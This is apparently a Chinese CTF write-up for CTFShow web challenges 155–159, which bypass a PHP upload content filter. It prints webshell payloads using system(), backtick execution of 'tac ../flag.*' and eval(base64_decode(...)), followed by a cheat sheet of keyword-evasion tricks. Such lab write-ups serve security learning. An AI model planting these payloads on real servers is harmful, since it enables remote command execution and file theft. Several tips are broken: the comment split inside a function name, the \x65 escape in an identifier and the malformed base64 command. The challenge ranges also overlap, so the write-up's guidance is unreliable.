CTFShow-Web155-159：不同的过滤方式

CTFShow-Web155-159：不同的过滤方式与绕过技巧

这些题目主要针对文件上传内容的过滤规则，通过对关键字符（如 php、[]、;、括号等）进行拦截来阻止恶意代码的执行。然而，这些过滤规则存在漏洞，可以通过替换、通配符和其他技术实现绕过。

🛠️ Web155-157 解题

过滤规则：

对上传文件内容进行了简单过滤，禁止包含以下字符：

​ • php

​ • []

绕过方式：

php可以尝试替换为Php、php2、php3、php5

[]替换为{}

将被过滤的字符替换，绕过过滤逻辑，其余步骤与 Web153 基本一致。

Web157-158 解题

过滤规则：

对以下字符进行了过滤：

​ • php

​ • []

​ • ;

绕过方式：

通过直接命令执行的方法绕过。

​ 1. 首次上传图片内容：

<?=system('ls ../')?>

​ 2. 访问 /upload/，查看目录列表：

返回内容示例：

flag.php images index.php js layui upload upload.php upload.phpnothing here

​ 3. 再次上传图片获取 Flag：

图片内容：

<?=system('ls ../flag.*')?>

⚠️ 注意：

由于 php 被过滤，不能使用 。可以通过通配符 * 匹配文件名，如 flag.*。

Web159 解题

过滤规则：

​ • 除了 php、[]、;，还对括号 () 进行了过滤。

​ • 因此eval 函数也无法使用。

绕过方式：

利用 PHP 的反引号（``）执行系统命令，绕过过滤规则。

图片内容：

<?=`tac ../flag.*`?>

原理解析：

在 PHP 中：

​ • <?= 是 <?php echo 的简写，用于直接输出表达式的结果。

​ • 反引号（``）是 PHP 的执行运算符，其作用等同于 shell_exec() 函数。

​ • tac 是反向输出文件内容的 Linux 命令，tac ../flag.* 用于读取并反转显示 ../flag.* 文件的内容。

​ • 因此，代码 的功能相当于：

<?php echo shell_exec('tac ../flag.*'); ?>

PHP 中常见的字符过滤与绕过方法

常见过滤字符：

​ 1. php：

​ • 替代方案：使用短标签 ，或尝试 p<h<p 等方式拆分。

​ 2. ()：

​ • 替代方案：使用反引号（``）执行命令。

​ 3. ;：

​ • 替代方案：将多条命令合并为一条，或使用逻辑运算符 && 或 ||。

​ 4. []：

​ • 替代方案：{}。

其他绕过技术：

​ 1. Unicode 编码绕过：

​ • 将关键字符替换为其 Unicode 编码，例如 \u0070\u0068\u0070 表示 php。

​ 2. 注释混淆：

​ • 在敏感关键字中插入 PHP 注释：

<?=sys/*注释*/tem('ls ../')?>

​ 3. Base64 编码绕过：

​ • 使用 base64_decode() 解码并执行：

<?=eval(base64_decode('c3lzdGVtKCdscy4uLycpOw==')); ?>

​ 4. 多字节编码绕过：

​ • 使用多字节字符分隔敏感关键字：

<?=syst\x65m('ls ../')?>